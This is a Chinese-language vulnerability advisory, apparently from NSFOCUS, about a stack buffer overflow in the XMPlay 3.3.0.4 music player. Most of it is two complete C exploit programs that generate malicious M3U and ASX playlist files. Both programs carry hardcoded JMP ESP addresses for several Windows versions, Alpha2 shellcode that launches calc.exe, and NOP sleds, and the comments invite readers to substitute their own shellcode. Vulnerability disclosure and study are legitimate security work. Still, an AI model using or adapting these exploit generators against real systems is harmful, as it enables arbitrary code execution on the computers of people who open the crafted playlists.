安全研究
安全漏洞
XMPlay播放列表文件远程栈溢出漏洞
发布日期:2006-11-20
更新日期:2006-11-22
受影响系统:
un4seen XMPlayer 3.3.0.4描述:
BUGTRAQ ID: 21206
XMPlay是一款免费、强大的Windows音乐播放器。
XMPlay在解析包含有超长文件名(大于500字节)的M3U播放列表时存在栈溢出漏洞,远程攻击者可能利用此漏洞在用户机器上执行任意指令。
如果攻击者受骗加载了恶意的M3U文件时就会触发这个漏洞,导致执行任意代码。
<*来源:Greg Linares (glinares.code@gmail.com)
链接:http://secunia.com/advisories/22999/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
===================================================================
0-day XMPlay 3.3.0.4 .M3U Filename Buffer Overflow Exploit
===================================================================
XMPlay 3.3.0.4 and lower experiance a stack-based buffer overflow when
loading malformed M3U files (probably PLS and ASX files as well).
This merely executes CALC.exe but you could always add your own custom
shellcode (alpha2)
Either the DisplayName field of the M3U or the FileName field can be
used to exploit the system, but during my tests, using the DisplayName
field caused Windows DEP to activate. (English Windows XP SP2)
Huge Greets and Thanks to Expanders (expanders[at]gmail[dot]com)
Who I presented the PoC and Discovery to, and he wrote the first PoC
Exploit for it. And Jerome Athias for some neat tools. Both of these
guys are very talented, keep up the good work.
Someone should try this with ASX and PLS files, i bet it works as well.
Reported Exploit Date: 11/20/2006
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char *argv[])
{
FILE * Exploit;
char buffer[512];
/* Executes Calc.exe Alpha2 Shellcode Provided by Expanders <expanders[at]gmail[dot]com> */
unsigned char scode[] =
"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI"
"YlHhQTs0s0c0LKcuwLLK1ls52Xs1JONkRofxNkcoUpUQZKCylK4tLKuQxnTqo0LYnLMTkpptUWiQ9ZdM"
"5QO2JKZT5k2tUtUTPuKULKQOfDc1zKPfNkflrkNkSowlvaZKLK5LlKgqxkMYqL14wtYSFQkpcTNkQPtp"
"LEiPd8VlNkqPVllKPp7lNMLK0htHjKuYnkMPnP7pc05PLKsXUlsovQxvU0PVOy9hlCo0SKRpsXhoxNip"
"sPu8LX9nMZvnv79oM7sSU1rLsSdnu5rX3UuPA";
char NOPSled[20];
char tail[] = ".mid\r\n";
char Overflow[5000];
int i, JMP;
printf("\n==============================================================\n");
printf("XMPlay 3.3.0.4 and prior M3U Filename Buffer Overflow Exploit\n");
printf("Discovered By: Greg Linares <GLinares.code[at]gmail[dot]com>\n");
printf("Original PoC coded by: Expanders <expanders[at]gmail[dot]com>\n\n");
printf("Usage: %s, <output M3U file> <JMP> [M3U Display Name]\n", argv[0]);
printf("\n JMP Options\n");
printf("1 = English Windows XP SP 2 User32.dll <JMP ESP 0x77db41bc>\n");
printf("2 = English Windows XP SP 1 User32.dll <JMP ESP 0x77d718fc>\n");
printf("3 = English Windows 2003 SP0 and SP1 User32.dll <JMP ESP 0x77d74adc>\n");
printf("4 = English Windows 2000 SP 4 User32.dll <JMP ESP 0x77e3c256>\n");
printf("================================================================\n\n\n");
if (argc < 2) {
printf("Invalid Number Of Arguments\n");
return 1;
}
Exploit = fopen(argv[1],"w");
if ( !Exploit )
{
printf("\nCouldn't Open File!");
return 1;
}
memset(Overflow, 0, 5000);
memset(buffer, 0, 505);
memset(NOPSled, 0, 20);
fputs("#EXTM3U\r\n", Exploit);
if (strlen(argv[3]) > 0) {
fputs("#EXTINF:0,", Exploit);
fputs(argv[3], Exploit);
fputs("\r\n", Exploit);
} else {
fputs("#EXTINF:0,XMPlay_0-Day_Buffer_Overflow_Exploit_By_Greg_Linares_and_Expanders\r\n", Exploit);
}
fputs("C:\\", Exploit);
for (i=0;i<505;i++) {
strcat(buffer, "A");
}
fputs(buffer, Exploit);
if (atoi(argv[2]) <= 0) {
JMP = 1;
} else if (atoi(argv[2]) > 4) {
JMP = 1;
} else {
JMP = atoi(argv[2]);
}
switch(JMP) {
case 1:
printf("Using English Windows XP SP2 JMP...\n");
fputs("\xbc\x41\xdb\x77", Exploit);
break;
case 2:
printf("Using English Windows XP SP1 JMP...\n");
fputs("\xfc\x18\xd7\x77", Exploit);
break;
case 3:
printf("Using English Windows 2003 SP0 & SP1 JMP...\n");
fputs("\xdc\x4a\xd7\x77", Exploit);
break;
case 4:
printf("Using English Windows 2000 SP 4 JMP...\n");
fputs("\x56\xc2\xe3\x77", Exploit);
break;
}
fputs(scode, Exploit);
for (i=0;i<20;i++) {
strcat(NOPSled, "\x90");
}
fputs(NOPSled, Exploit);
fputs(tail, Exploit);
printf("Exploit Succeeded...\n Output File: %s\n\n", argv[1]);
printf("Exploit Coded by Greg Linares (GLinares.code[at]gmail[dot]com)\n");
printf("Greetz to: Jerome Athias and Expanders - Thanks For The Ideas, Tools and Alpha2 Shell Code\n");
fclose(Exploit);
return 0;
}
==============================================================================================
/*
===================================================================
0-day XMPlay 3.3.0.4 .ASX Filename Buffer Overflow Exploit
===================================================================
XMPlay 3.3.0.4 and lower experiance a stack-based buffer overflow when
loading malformed .ASX files
This merely executes CALC.exe but you could always add your own custom
shellcode (alpha2)
===============
ASX
<ASX VERSION="3">
<ENTRY>
<REF HREF="file://[EXPLOIT HERE]"
</ENTRY>
</ASX>
===============
Reported Exploit Date: 11/21/2006
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char *argv[])
{
FILE *Exploit;
char buffer[512];
/* Executes Calc.exe Alpha2 Shellcode Provided by Expanders
<expanders[at]gmail[dot]com> */
unsigned char scode[] =
"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI"
"YlHhQTs0s0c0LKcuwLLK1ls52Xs1JONkRofxNkcoUpUQZKCylK4tLKuQxnTqo0LYnLMTkpptUWiQ9ZdM"
"5QO2JKZT5k2tUtUTPuKULKQOfDc1zKPfNkflrkNkSowlvaZKLK5LlKgqxkMYqL14wtYSFQkpcTNkQPtp"
"LEiPd8VlNkqPVllKPp7lNMLK0htHjKuYnkMPnP7pc05PLKsXUlsovQxvU0PVOy9hlCo0SKRpsXhoxNip"
"sPu8LX9nMZvnv79oM7sSU1rLsSdnu5rX3UuPA";
char NOPSled[50];
char tail[] = ".mid\x22\r\n";
int JMP, x;
printf("\n======================================================================\n");
printf("XMPlay 3.3.0.4 and prior ASX Filename Buffer Overflow
Exploit\n");
printf("Discovered and Coded By: Greg Linares
<GLinares.code[at]gmail[dot]com>\n");
printf("Usage: %s <output ASX file> <JMP>\n", argv[0]);
printf("\n JMP Options\n");
printf("1 = English Windows XP SP 2 User32.dll <JMP ESP
0x77db41bc>\n");
printf("2 = English Windows XP SP 1 User32.dll <JMP ESP
0x77d718fc>\n");
printf("3 = English Windows 2003 SP0 and SP1 User32.dll <JMP ESP
0x77d74adc>\n");
printf("4 = English Windows 2000 SP 4 User32.dll <JMP ESP
0x77e3c256>\n");
printf("====================================================================\n\n\n");
if (argc < 2) {
printf("Invalid Number Of Arguments\n");
return 1;
}
Exploit = fopen(argv[1],"w");
if ( !Exploit )
{
printf("\nCouldn't Open File!");
return 1;
}
memset(buffer, 0, 505);
memset(NOPSled, 0, 20);
fputs("<ASX VERSION=\x22\x33\x22>\r\n<ENTRY>\r\n", Exploit);
fputs("<REF HREF=\x22", Exploit);
fputs("file://C:\\", Exploit);
for (x=0;x<498;x++) {
strcat(buffer, "A");
}
fputs(buffer, Exploit);
if (atoi(argv[2]) <= 0) {
JMP = 1;
} else if (atoi(argv[2]) > 4) {
JMP = 1;
} else {
JMP = atoi(argv[2]);
}
switch(JMP) {
case 1:
printf("Using English Windows XP SP2 JMP...\n");
fputs("\xbc\x41\xdb\x77", Exploit);
break;
case 2:
printf("Using English Windows XP SP1 JMP...\n");
fputs("\xfc\x18\xd7\x77", Exploit);
break;
case 3:
printf("Using English Windows 2003 SP0 & SP1
JMP...\n");
fputs("\xdc\x4a\xd7\x77", Exploit);
break;
case 4:
printf("Using English Windows 2000 SP 4
JMP...\n");
fputs("\x56\xc2\xe3\x77", Exploit);
break;
}
fputs(scode, Exploit);
for (x=0;x<20;x++) {
strcat(NOPSled, "\x90");
}
fputs(NOPSled, Exploit);
fputs(tail, Exploit);
fputs("</ENTRY>\r\n</ASX>\r\n", Exploit);
printf("Exploit Succeeded...\n Output File: %s\n\n", argv[1]);
printf("Exploit Coded by Greg Linares
(GLinares.code[at]gmail[dot]com)\n");
printf("Greetz to: Jerome Athias and Expanders - Thanks For The
Ideas, Tools and Alpha2 Shell Code\n");
fclose(Exploit);
return 0;
}
建议:
厂商补丁:
un4seen
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.un4seen.com/
浏览次数:3344
严重程度:0(网友投票)
绿盟科技给您安全的保障